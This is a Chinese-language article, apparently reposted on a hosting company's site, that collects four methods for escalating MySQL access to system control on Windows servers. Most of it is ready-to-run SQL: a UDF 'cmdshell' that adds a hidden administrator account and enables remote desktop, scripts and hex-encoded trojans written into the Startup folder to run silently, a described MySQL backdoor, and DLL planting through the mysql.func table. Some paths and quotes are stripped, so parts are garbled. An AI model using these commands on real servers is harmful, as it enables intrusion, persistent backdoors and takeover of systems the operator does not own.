关于mysql提权方法总结.doc

关于mysql提权方法总结 mysql是一种开放源代码的关系型数据库管理系统（rdbms），mysql数据库系统使用最常用的数据库管理语言-结构化查询语言（sql）进行数据库管理。那么对于mysql提权的方法，站长们是否了解呢？专职优化、域名注册、网站空间、虚拟主机、服务器托管、vps主机、服务器租用的中国信息港在这里为你做深入探讨！mysql提权总结方法四则一 UDF提权这类提权方法我想大家已经知道了，我大致写一下，具体语句如下：1 create function cmdshell returns string soname udf.dll 2 select cmdshell(net user iis_user 123!#abcABC /add); 3 select cmdshell(net localgroup administrators iis_user /add); 4 select cmdshell(regedit /s d:web3389.reg); 5 drop function cmdshell; 6 select cmdshell(netstat -an); 二 VBS启动项提权1 create table a (cmd text); 2 insert into a values (set wshshell=createobject (wscript.shell) ); 3 insert into a values (a=wshshell.run (cmd.exe /c net user iis_user 123!#abcABC /add,0) ); 4 insert into a values (b=wshshell.run (cmd.exe /c net localgroup administrators iis_user /add,0) ); 5 select * from a into outfile C:Documents and SettingsAll Users开始菜单程序启动a.vbs; 先在webshell里连接上数据库,建立表，将VBS写入表里，然后导入启动项，如果UDF提权不行的话也可以尝试下这个方法，前提是要有ROOT权限，后面有个,0表示不弹出CMD窗口，安静的运行。还可以这样写:1 create table a (cmd BLOB); 2 insert into a values （CONVERT(木马的16进制代码,CHAR); 3 select * from a into dumpfile C:Documents and SettingsAll Users开始菜单程序启动mm.exe 4 drop table a; 执行前3条语句，就可以将木马写进启动里了，前提是木马一定要是16进制，还有就是路径要是，因为windows会自动过滤掉一个三 Linx Mysql BackDoor提权Linx Mysql DoorMysql BackDoor是一款针对PHP+Mysql服务器开发的后门,该后门安装后为Mysql增加一个可以执行系统命令的state函数,并且随Mysql进程启动一个基于Dll的嗅探型后门,这个后门在Windows下拥有与Mysql一样的系统权限,从而巧妙的实现了无端口,无进程,无服务的穿墙木马.用法：将Mysql.php传到PHP服务器上,点击自动安装Mysql BackDoor，然后直接执行命令即可四，MIX.DLL提权1 create table temp_mix(abc longblob); 2 insert into temp_mix values(load_file(D:webudf.dll); 3 select * from temp_mix into dumpfile C:Windowssystem32udf.dll; 4 create function MyCmd returns string soname udf.dll; 5 select MyCmd(net user); 6 drop table if exists temp_mix; 前三句主要目的是把DLL放到系统目录.第4句建立函数.然后就可以执行系统命令了。而最容易出问题的就是第4句cant open shared library udf.dll(error 2);就说下他.先前的时候.有次提权.可以建立函数.也忘了什么原因了.需要重新建下这个函数首先百度了下.说得是:1 drop function MyCmd; 就可以删到已经建立的函数.测试了下发现还是不行.然后继续找的时候.说这是MYSQL的一个BUG可以执行如下语句:1 delete from mysql.func where name=MyCmd; 测试了下成功了.前天再次盯着屏幕上的cant open shared library udf.dll又看到了这条delete语句.我们知道delete就是删除.是删的表里的东西.删下表就可以删了函数了?那反过来.建立函数是不是就是往表里插入一条新记录?而且是mysql.func.也就是mysql这个库里的func表.呵呵.看名字也象.测试一番后.得出如下结果:在提权的时候.建立函数显示cant open shared library udf.dll就干脆跳过这句执行另外一句.或者说.把第4句换成:1 insert into mysql.func values(MyCmd,0,udf.dll,function); 说下func这个表的结构:4 列.name,return,dl,fun.第二列和第四列的名字记不大清楚了但意思一样.有兴趣可以自己1 select * from func; 下就知道了第一列就是新建函数的名字.字符串.第二列是返回值.填0.第三列dl指函数所在的dll名字.字符串类型这里为我们导到系统目录里的dll名.不一定是udf.dll.只要跟你导出的一样就行.第四列作用不清楚但是填上funciton这个字符串就能用.应该是指这个是个函数吧.因为这只是个插入操作所以只要是root.应该不会有错误的.后面的就一样了.1 select MyCmd(whoami); 但是别急!这里有个前提:需要重启MYSQL.我对MYSQL不了解.但是重启后新建的函数绝对可用.貌似有别的办法可以达到同样的效果好象是flush.但是具体flush哪里.就不知道了.不过不是权限.也不是func表.试过了.而且MYSQL下搜了很久也没找到root在MYSQL下通过命令重启的.总有种感觉.不用重启的.中国信息港专业域名注册,域名申请,域名查询,服务器托管，服务器租用,云主机,虚拟主机,vps主机